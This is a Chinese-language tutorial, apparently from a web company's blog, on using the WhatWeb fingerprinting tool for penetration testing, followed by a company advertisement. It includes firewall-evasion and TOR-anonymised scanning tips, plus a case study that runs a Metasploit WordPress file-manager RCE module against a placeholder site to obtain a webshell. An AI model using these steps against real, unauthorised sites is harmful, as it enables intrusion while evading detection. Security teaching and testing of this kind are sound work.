WhatWeb 渗透神器:一键识别网站指纹,精准探测漏洞!
想要快速摸清目标网站的底细?找准突破口?
神兵利器 WhatWeb
,轻松识别网站信息,助你精准打击!
今天带你全面掌握 WhatWeb,从原理、命令到实战案例,看完就能上手!
1. 什么是 WhatWeb?
WhatWeb
是一款强大的 Web 指纹识别工具,能够快速分析目标网站的 CMS、服务器类型、编程语言、框架、安全防护、CDN 等信息,帮助安全研究人员和渗透测试人员精准定位目标系统。
✅ 支持超过 1800+ 种 Web 技术指纹
✅ 可识别 CMS(WordPress、Joomla、Drupal)等
✅ 检测服务器信息(Apache、Nginx、IIS)
✅ 获取网站安全防护情况(WAF、CDN)
✅ 支持 GET
、POST
、HEAD
多种请求方式
✅ 可绕过 WAF
(Web 应用防火墙)
✅ 支持批量扫描,一键收集多个网站信息
安装 WhatWeb
# Kali Linux / Parrot OS 自带,无需安装
sudo apt install whatweb -y
# MacOS
brew install whatweb
# 手动安装
git clone https://github.com/urbanadventurer/WhatWeb.git
cd WhatWeb
ruby whatweb
查看 WhatWeb 版本
whatweb -v
查看 WhatWeb 帮助
whatweb --help
2. WhatWeb 基础命令 扫描目标网站
whatweb http://target.com
默认扫描 http://target.com
并返回网站基本信息
批量扫描多个网站
whatweb http://target1.com http://target2.com http://target3.com
扫描指定端口
whatweb -p 8080 http://target.com
可用于扫描非标准端口的网站(如 8080
、8443
)
深度扫描(增加检测力度)
whatweb -a 3 http://target.com
-a
选项调整扫描级别,范围 1-5
(默认 1
)
• 1
– 轻量级扫描(最快,但识别率低)• 3
– 平衡模式(推荐)• 5
– 深度扫描(最慢,识别率最高)
静默模式(仅输出扫描结果,不显示日志)
whatweb -q http://target.com
使用代理绕过防火墙
whatweb --proxy http://127.0.0.1:8080 http://target.com
可用于 Burp Suite
流量分析或绕过 WAF
伪装浏览器 User-Agent
whatweb -U "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" http://target.com
避免被防火墙拦截,提高扫描成功率!
保存扫描结果
whatweb -a 3 http://target.com -o report.txt
支持 txt
、json
、xml
等多种格式,方便后续分析
⚡ 3. WhatWeb 进阶玩法
检测 CMS(网站后台)
whatweb -a 3 http://target.com | grep "CMS"
快速识别 WordPress、Joomla、Drupal 等 CMS
检查网站是否使用 CDN
whatweb -a 3 http://target.com | grep "Cloudflare"
如果返回 Cloudflare
、Akamai
,说明网站使用了 CDN
扫描多个 URL 列表
whatweb -i urls.txt -o results.txt
适用于大规模资产测绘,批量收集网站指纹
使用 TOR 进行匿名扫描
proxychains whatweb -a 3 http://target.com
隐藏真实 IP,防止被目标网站追踪
?️ 4. 实战案例:从网站指纹到漏洞利用
目标站点:http://vulnerable.com
我们要使用 WhatWeb
扫描网站指纹,并寻找可利用的漏洞!
第一步:收集网站基本信息
whatweb -a 3 http://vulnerable.com
扫描结果:
• 服务器:Apache 2.4.29 • CMS:WordPress 5.4.2 • 发现 robots.txt
(可能泄露敏感路径!)• 发现 wp-login.php
(WordPress 登录页!)
第二步:检查 WordPress 插件漏洞
使用 WhatWeb
发现插件信息
whatweb -a 3 http://vulnerable.com | grep "plugin"
发现 WordPress 插件 wp-file-manager
版本 6.9
(存在 RCE 漏洞!)
利用 Metasploit 攻击
msfconsole
use exploit/unix/webapp/wp_file_manager_rce
set RHOSTS vulnerable.com
set TARGETURI /wp-content/plugins/wp-file-manager
exploit
成功获取 WebShell,进一步渗透! ?
5. 如何防御 WhatWeb 扫描?
✅ 隐藏服务器信息(修改 Server
头部)
✅ 禁用不必要的目录(如 /wp-admin/
、/backup/
)
✅ 升级 Web 服务器和 CMS,修复已知漏洞
✅ 使用 WAF
(Web 应用防火墙)拦截扫描
✅ 部署 Fail2Ban
限制恶意扫描 IP
6. 总结
WhatWeb 是最强大的 Web 指纹识别工具之一,快速扫描网站信息,精准定位漏洞!
支持 CMS、WAF、CDN 识别,批量扫描,配合 Metasploit 可实现自动化攻击!防守方必须学会使用,定期自查,避免网站被黑!

优网科技秉承"专业团队、品质服务" 的经营理念,诚信务实的服务了近万家客户,成为众多世界500强、集团和上市公司的长期合作伙伴!
优网科技成立于2001年,擅长网站建设、网站与各类业务系统深度整合,致力于提供完善的企业互联网解决方案。优网科技提供PC端网站建设(品牌展示型、官方门户型、营销商务型、电子商务型、信息门户型、DIY体验、720全景展厅及3D虚拟仿真)、移动端应用(手机站、APP开发)、微信定制开发(微信官网、微信商城、企业微信)、微信小程序定制开发等一系列互联网应用服务。